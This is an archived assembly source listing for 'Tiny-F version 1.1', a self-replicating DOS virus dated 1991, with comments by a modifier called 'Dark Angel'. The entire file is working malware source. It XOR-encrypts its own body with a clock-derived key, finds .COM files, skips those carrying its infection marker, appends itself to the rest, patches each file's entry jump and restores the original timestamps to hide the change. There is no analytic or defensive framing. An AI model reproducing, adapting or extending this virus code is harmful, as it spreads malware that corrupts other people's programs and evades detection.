home *** CD-ROM | disk | FTP | other *** search
- tinyv SEGMENT BYTE PUBLIC 'code'
-
- ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv
-
-
-
- ORG 100h
-
-
-
- DOS EQU 21h
-
-
-
- start: JMP pgstart
-
- exlbl: db 0CDh, 20h, 7, 8, 9
-
- pgstart:CALL tinyvir
-
- tinyvir:
-
- POP SI ; get SI for storage
-
- SUB SI,offset tinyvir ; reset SI to virus start
-
- MOV BP,[SI+blnkdat] ; store SI in BP for return
-
- ADD BP, OFFSET exlbl
-
- CALL endecrpt
-
- JMP SHORT realprog
-
-
-
- ;-----------------------------------------------------------------------------
-
- ; nonencrypted subroutines start here
-
- ;-----------------------------------------------------------------------------
-
-
-
- ; PCM's encryption was stupid, mine is better - Dark Angel
-
- endecrpt:
-
- ; Only need to save necessary registers - Dark Angel
-
- PUSH AX ; store registers
-
- PUSH BX
-
- PUSH CX
-
- PUSH SI
-
- ; New, better, more compact encryption engine
-
- MOV BX, [SI+EN_VAL]
-
- ADD SI, offset realprog
-
- MOV CX, endenc - realprog
-
- SHR CX, 1
-
- JNC start_encryption
-
- DEC SI
-
- start_encryption:
-
- MOV DI, SI
-
- encloop:
-
- LODSW ; DS:[SI] -> AX
-
- XOR AX, BX
-
- STOSW
-
- LOOP encloop
-
-
-
- POP SI ; restore registers
-
- POP CX
-
- POP BX
-
- POP AX
-
- RET
-
- ;-----end of encryption routine
-
- nfect:
-
- CALL endecrpt
-
- MOV [SI+offset endprog+3],AX; point to data
-
- MOV AH,40H ; write instruction
-
- LEA DX,[SI+0105H] ; write buffer loc |
-
- MOV CX,offset endprog-105h ; (size of virus) --\|/--
-
- INT DOS ; do it!
-
- PUSHF
-
- CALL endecrpt
-
- POPF
-
- JC outa1 ; error, bug out
-
- RET
-
- outa1:
-
- JMP exit
-
-
-
-
-
- ;-----------------------------------------------------------------------------
-
- ; Unencrypted routines end here
-
- ;-----------------------------------------------------------------------------
-
- realprog:
-
- CLD ; forward direction for string ops
-
- ; Why save DTA? This part killed. Saves quite a few bytes. Dark Angel
-
- ; Instead, set DTA to SI+ENDPROG+131h
-
- MOV AH, 1Ah ; Set DTA
-
- LEA DX, [SI+ENDPROG+131h] ; to DS:DX
-
- INT 21h
-
-
-
- LEA DX,[SI+fspec] ; get filespec (*.COM)
-
- XOR CX, CX ; || (clear regs)
-
- MOV AH,4EH ; || (find files)
-
- mainloop: ; \||/
-
- INT DOS ; ----\/----
-
- JC hiccup ; no more files found, terminate virus
-
- ; Next part had to be changed to account for new DTA address - Dark Angel
-
- LEA DX, [SI+ENDPROG+131h+30]; set file name pointer
-
- ; (offset 30 is DTA filename start)
-
- MOV AX,3D02H ; open file
-
- INT DOS ; do it!
-
- MOV BX,AX ; move file handle to BX
-
- MOV AH,3FH ; read file
-
- LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
-
- MOV DI,DX ; set Dest Index to area for buffer
-
- MOV CX,0003H ; read 3 bytes
-
- INT DOS ; do it!
-
- CMP BYTE PTR [DI],0E9H ; check for JMP at start
-
- JE infect ; If begins w/JMP, Infect
-
- nextfile:
-
- MOV AH,4FH ; set int 21 to find next file
-
- JMP mainloop ; next file, do it!
-
- hiccup: JMP exit
-
- infect:
-
- MOV AX,5700h ; get date function
-
- INT DOS ; do it!
-
- PUSH DX ; store date + time
-
- PUSH CX
-
- MOV DX,[DI+01H] ; set # of bytes to move
-
- MOV [SI+blnkdat],DX ; " " " " " "
-
- ; Tighter Code here - Dark Angel
-
- XOR CX,CX ; " " " " " " (0 here)
-
- MOV AX,4200H ; move file
-
- INT DOS ; do it!
-
- MOV DX,DI ; set dest index to area for buffer
-
- MOV CX,0002H ; two bytes
-
- MOV AH,3FH ; read file
-
- INT DOS ; do it!
-
- CMP WORD PTR [DI],0807H ; check for infection
-
- JE nextfile ; next file if infected
-
- getaval: ; encryption routine starts here
-
- ; My modifications here - Dark Angel
-
- MOV AH, 2Ch ; DOS get TIME function
-
- INT DOS ; do it!
-
- OR DX, DX ; Is it 0?
-
- JE getaval ; yeah, try again
-
- MOV word ptr [si+offset en_val], DX ; Store it
-
- ; Tighter code here - Dark Angel
-
- XOR DX,DX ; clear regs
-
- XOR CX,CX ; " "
-
- MOV AX,4202H ; move file pointer
-
- INT DOS ; do it!
-
- OR DX,DX ; new pointer location 0?
-
- JNE nextfile ; if no then next file
-
- CMP AH,0FEH ; new pointer loc too high?
-
- JNC nextfile ; yes, try again
-
- CALL nfect
-
- MOV AX,4200H ; move pointer
-
- XOR CX, CX ; clear reg
-
- MOV DX,OFFSET 00001 ; where to set pointer
-
- INT DOS ; do it!
-
- MOV AH,40H ; write to file
-
- LEA DX,[SI+offset endprog+3]; write data at SI+BUFFER
-
- MOV CX,0002H ; two bytes (the JMP)
-
- INT DOS ; do it!
-
- MOV AX,5701h ; store date
-
- POP CX ; restore time
-
- POP DX ; restore date
-
- INT DOS ; do it!
-
- exit:
-
- MOV AH,3EH ; close file
-
- INT DOS ; do it!
-
-
-
- ; Return DTA to old position - Dark Angel
-
-
-
- MOV AH, 1Ah ; Set DTA
-
- MOV DX, 80h ; to PSP DTA
-
- INT 21h
-
-
-
- JMP BP
-
-
-
- ;-----------------------------------------------------------------------------
-
- ; encrypted data goes here
-
- ;-----------------------------------------------------------------------------
-
-
-
- fspec LABEL WORD
-
- DB '*.COM',0
-
- nondata DB 'Tiny-F version 1.1' ; Program identification
-
- DB '��ÿÇ╫@&ε╖│╜δ' ; author identification
-
- DB 'Released 10-19-91' ; release date
-
- endenc LABEL BYTE ; end of encryption zone
-
- ;-----------------------------------------------------------------------------
-
- ; nonencrypted data goes anywhere after here
-
- ;-----------------------------------------------------------------------------
-
-
-
- blnkdat LABEL WORD
-
- DW 0000H
-
-
-
- ; Only en_val is needed now because of new encryption mechanism
-
- en_val DW 0h
-
-
-
- endprog LABEL WORD
-
- tinyv ENDS
-
- END start
-
-
-
-
